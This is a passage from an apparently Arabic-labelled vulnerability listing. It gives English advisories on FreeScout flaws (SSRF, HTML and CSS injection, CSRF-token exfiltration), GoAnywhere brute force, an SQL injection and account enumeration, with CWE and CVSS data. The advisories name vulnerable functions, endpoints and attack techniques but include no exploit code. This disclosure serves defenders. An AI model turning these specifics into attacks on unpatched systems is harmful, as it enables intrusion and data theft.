session is compromised via a separate vulnerability (e.g., XSS), the attacker gains persistent email exfiltration that survives session expiry. Version 1.8.213 fixes the issue.

نوع الثغرة

CWE-284 — CWE-284

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:L

المراجع

الوصف الكامل

FreeScout is a free self-hosted help desk and shared mailbox. Prior to version 1.8.213, an unauthenticated attacker can inject arbitrary HTML into outgoing emails generated by FreeScout by sending an email with a crafted From display name. The name is stored in the database without sanitization and rendered unescaped into outgoing reply emails via the `{%customer.fullName%}` signature variable. This allows embedding phishing links, tracking pixels, and spoofed content inside legitimate support emails sent from the organization's address. Version 1.8.213 fixes the issue.

نوع الثغرة

CWE-116 — CWE-116

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N

المراجع

الوصف الكامل

FreeScout is a free self-hosted help desk and shared mailbox. Versions prior to 1.8.213 have a Server-Side Request Forgery (SSRF) vulnerability in the IMAP/SMTP connection test functionality of FreeScout's `MailboxesController`. Three AJAX actions `fetch_test` (line 731), `send_test` (line 682), and `imap_folders` (line 773) in `app/Http/Controllers/MailboxesController.php` pass admin-configured `in_server`/`in_port` and `out_server`/`out_port` values directly to `fsockopen()` via `Helper::checkPort()` and to IMAP/SMTP client connections with zero SSRF protection. There is no IP validation, no hostname restriction, no blocklist of internal ranges, and no call to the project's own `sanitizeRemoteUrl()` or `checkUrlIpAndHost()` functions. The validation block in `connectionIncomingSave()` is entirely commented out. An authenticated admin can configure a mailbox's IMAP or SMTP server to point at any internal host and port, then trigger a connection test. The server opens raw TCP connections (via `fsockopen()`) and protocol-level connections (via IMAP client or SMTP transport) to the attacker-specified target. The response differentiates open from closed ports, enabling internal network port scanning. When the IMAP client connects to a non-IMAP service, the target's service banner or error response is captured in the IMAP debug log and returned in the AJAX response's `log` field, making this a semi-blind SSRF that enables service fingerprinting. In cloud environments, the metadata endpoint at `169[.]254[.]169[.]254` can be probed and partial response data may be leaked through protocol error messages. This is distinct from the `sanitizeRemoteUrl()` redirect bypass (freescout-3) -- different code path, different root cause, different protocol layer. Version 1.8.213 patches the vulnerability.

نوع الثغرة

CWE-918 — SSRF

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N

المراجع

الوصف الكامل

FreeScout is a free self-hosted help desk and shared mailbox. Prior to version 1.8.213, FreeScout's linkify() function in app/Misc/Helper.php converts plain-text URLs in email bodies into HTML anchor tags without escaping double-quote characters (") in the URL. HTMLPurifier (called first via getCleanBody()) preserves literal " characters in text nodes. linkify() then wraps URLs including those " chars inside an unescaped href="..." attribute, breaking out of the href and injecting arbitrary HTML attributes. Version 1.8.213 fixes the issue.

الإصدارات المتأثرة

1.8.213

نوع الثغرة

CWE-79 — XSS

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

المراجع

الوصف الكامل

The login limit is not enforced on the SFTP service of Fortra's GoAnywhere MFT prior to 7.10.0 if the Web User attempting to be logged in to is configured to log in with an SSH Key, making the SSH key vulnerable to being guessed via Brute Force.

الإصدارات المتأثرة

7.10.0

نوع الثغرة

CWE-307 — CWE-307

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

المراجع

الوصف الكامل

FreeScout is a free self-hosted help desk and shared mailbox. Prior to version 1.8.213, FreeScout's `Helper::stripDangerousTags()` removes `<script>`, `<form>`, `<iframe>`, `<object>` but does NOT strip `<style>` tags. The mailbox signature field is saved via POST /mailbox/settings/{id} and later rendered unescaped via `{!! $conversation->getSignatureProcessed([], true) !!}` in conversation views. CSP allows `style-src * 'self' 'unsafe-inline'`, so injected inline styles execute freely. An attacker with access to mailbox settings (admin or agent with mailbox permission) can inject CSS attribute selectors to exfiltrate the CSRF token of any agent/admin who views a conversation in that mailbox. With the CSRF token, the attacker can perform any state-changing action as the victim (create admin accounts, change email/password, etc.) — privilege escalation from agent to admin. This is the result of an incomplete fix of GHSA-jqjf-f566-485j. That advisory reported XSS via mailbox signature. The fix applied `Helper::stripDangerousTags()` to the signature before saving. However, `stripDangerousTags()` only removes `script`, `form`, `iframe`, and `object` tags — it does NOT strip `<style>` tags, leaving CSS injection possible. Version 1.8.213 contains an updated fix.

الإصدارات المتأثرة

1.8.213

نوع الثغرة

CWE-79 — XSS

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N

المراجع

الوصف الكامل

SQL Injection vulnerability in Apartment Visitors Management System Apartment Visitors Management System V1.1 in the email parameter of the forgot password page (forgot-password.php). This allows an unauthenticated attacker to manipulate backend SQL queries and retrieve sensitive user data.

نوع الثغرة

CWE-89 — SQL Injection

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

المراجع

الوصف الكامل

OpenAEV is an open source platform allowing organizations to plan, schedule and conduct cyber adversary simulation campaign and tests. Starting in version 1.11.0 and prior to version 2.0.13, the /api/reset endpoint behaves differently depending on whether the supplied username exists in the system. When a non-existent email is provided in the login parameter, the endpoint returns an HTTP 400 response (Bad Request). When a valid email is supplied, the endpoint responds with HTTP 200. This difference in server responses creates an observable discrepancy that allows an attacker to reliably determine which emails are registered in the application. By automating requests with a list of possible email addresses, an attacker can quickly build a list of valid accounts without any authentication. The endpoint should return a consistent response regardless of whether the username exists in order to prevent account enumeration. Version 2.0.13 fixes this issue.

نوع الثغرة

CWE-204 — CWE-204

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

المراجع